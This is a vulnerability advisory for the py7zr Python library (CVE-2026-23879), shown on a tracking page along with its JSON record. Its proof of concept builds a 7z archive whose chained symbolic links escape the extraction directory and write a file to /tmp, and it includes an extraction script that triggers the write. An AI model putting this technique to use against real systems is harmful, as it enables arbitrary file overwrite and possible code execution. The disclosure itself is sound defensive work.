GHSA-Q6RC-2CGV-63H7
Vulnerability from github – Published: 2026-06-19 19:21 – Updated: 2026-06-19 19:21
VLAI
Summary
py7zr: Arbitrary File Write Vulnerability
Details
Summary
There exists an arbitrary file write vulnerability in py7zr (1.1.0, latest), which allows symbolic links to be recreated outside the destination directory via crafted malicious symbolic link chains. When using extractall to extract an archive, the library restores these symbolic links, linking them to arbitrary directories on the host file system. Subsequent extraction of regular files through these symbolic links can result in arbitrary file writes. This vulnerability may lead to remote code execution, privilege escalation, data corruption, or denial of service.
Details
The root cause of this vulnerability is that py7zr fails to properly restrict the targets of symbolic links within an archive. During extraction, the program only checks the link arcname within the destination directory, but ignores the combined symlink path resolution. Attackers can exploit this vulnerability by constructing malicious archives, thereby bypassing the directory boundary restrictions implemented by the extractor.
PoC
Construct PoC Archive File
The following pseudo-code illustrates the vulnerable logic.
def create_sevenz_exp(output_dir: str):
filename = "archive.7z"
file_path = output_dir + filename
with py7zr.SevenZipFile(file_path, 'w') as archive:
archive.writestr("Some Text", "dir0/someFile.txt")
add_symlink(archive, "dir1", "dir0/..")
add_symlink(archive, "dir2", "dir1/..")
add_symlink(archive, "dir3", "dir2/..")
add_symlink(archive, "dir4", "dir3/..")
add_symlink(archive, "dir5", "dir4/..")
add_symlink(archive, "dir6", "dir5/..")
add_symlink(archive, "dir7", "dir6/..")
add_symlink(archive, "dir8", "dir7/..")
add_symlink(archive, "myTmp", "dir8/tmp")
archive.writestr("Malicious Text\n", "myTmp/poc.txt")
Unpack the archive
Use common decompression methods, then extract the archive.
import sys
import os
import py7zr
def extract_7z(seven_path, output_dir):
os.makedirs(output_dir, exist_ok=True)
with py7zr.SevenZipFile(seven_path, mode='r') as z:
z.extractall(path=output_dir)
print(f"Extracted '{seven_path}' to '{output_dir}'")
if __name__ == "__main__":
seven_file = sys.argv[1]
base_name = os.path.splitext(os.path.basename(seven_file))[0]
output = base_name + "_sevenz_output"
extract_7z(seven_file, output)
Impact
After decompression, the output directory contains a sequence of symbolic links, which can finally point to the system root directory. Then, when extracting a regular file, the file will be written to an arbitrary path.
Severity
8.0 (High)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.1.2"
},
"package": {
"ecosystem": "PyPI",
"name": "py7zr"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.1.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-23879"
],
"database_specific": {
"cwe_ids": [
"CWE-59"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-19T19:21:57Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\nThere exists an **arbitrary file write vulnerability** in `py7zr` (1.1.0, latest), which allows symbolic links to be recreated outside the destination directory via crafted malicious symbolic link chains. When using `extractall` to extract an archive, the library restores these symbolic links, linking them to arbitrary directories on the host file system. Subsequent extraction of regular files through these symbolic links can result in arbitrary file writes. This vulnerability may lead to remote code execution, privilege escalation, data corruption, or denial of service.\n\n### Details\nThe root cause of this vulnerability is that `py7zr` fails to properly restrict the targets of symbolic links within an archive. During extraction, the program only checks the link arcname within the destination directory, but ignores the combined symlink path resolution. Attackers can exploit this vulnerability by constructing malicious archives, thereby bypassing the directory boundary restrictions implemented by the extractor.\n\n\u003cimg width=\"1806\" height=\"834\" alt=\"image\" src=\"https://github.com/user-attachments/assets/cdd27ddb-ba79-4b20-b8b9-21f3e16a6e8b\" /\u003e\n\n\n### PoC\n#### **Construct PoC Archive File**\nThe following pseudo-code illustrates the vulnerable logic.\n\n```python\ndef create_sevenz_exp(output_dir: str):\n filename = \"archive.7z\"\n file_path = output_dir + filename\n with py7zr.SevenZipFile(file_path, \u0027w\u0027) as archive:\n archive.writestr(\"Some Text\", \"dir0/someFile.txt\")\n add_symlink(archive, \"dir1\", \"dir0/..\")\n add_symlink(archive, \"dir2\", \"dir1/..\")\n add_symlink(archive, \"dir3\", \"dir2/..\")\n add_symlink(archive, \"dir4\", \"dir3/..\")\n add_symlink(archive, \"dir5\", \"dir4/..\")\n add_symlink(archive, \"dir6\", \"dir5/..\")\n add_symlink(archive, \"dir7\", \"dir6/..\")\n add_symlink(archive, \"dir8\", \"dir7/..\")\n add_symlink(archive, \"myTmp\", \"dir8/tmp\")\n archive.writestr(\"Malicious Text\\n\", \"myTmp/poc.txt\")\n```\n\n#### **Unpack the archive**\n\nUse common decompression methods, then extract the archive.\n\n```python\nimport sys\nimport os\nimport py7zr\n\ndef extract_7z(seven_path, output_dir):\n os.makedirs(output_dir, exist_ok=True)\n with py7zr.SevenZipFile(seven_path, mode=\u0027r\u0027) as z:\n z.extractall(path=output_dir)\n print(f\"Extracted \u0027{seven_path}\u0027 to \u0027{output_dir}\u0027\")\n\nif __name__ == \"__main__\":\n seven_file = sys.argv[1]\n base_name = os.path.splitext(os.path.basename(seven_file))[0]\n output = base_name + \"_sevenz_output\"\n\n extract_7z(seven_file, output)\n```\n\n### Impact\n\u003cimg width=\"1268\" height=\"572\" alt=\"image\" src=\"https://github.com/user-attachments/assets/919b5ff6-97ba-4781-b3e4-e9c9cc0f229b\" /\u003e\n\nAfter decompression, the `output` directory contains a sequence of symbolic links, which can finally point to the system root directory. Then, when extracting a regular file, the file will be written to an arbitrary path.",
"id": "GHSA-q6rc-2cgv-63h7",
"modified": "2026-06-19T19:21:57Z",
"published": "2026-06-19T19:21:57Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/miurahr/py7zr/security/advisories/GHSA-q6rc-2cgv-63h7"
},
{
"type": "PACKAGE",
"url": "https://github.com/miurahr/py7zr"
},
{
"type": "WEB",
"url": "https://github.com/miurahr/py7zr/releases/tag/v1.1.3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "py7zr: Arbitrary File Write Vulnerability"
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…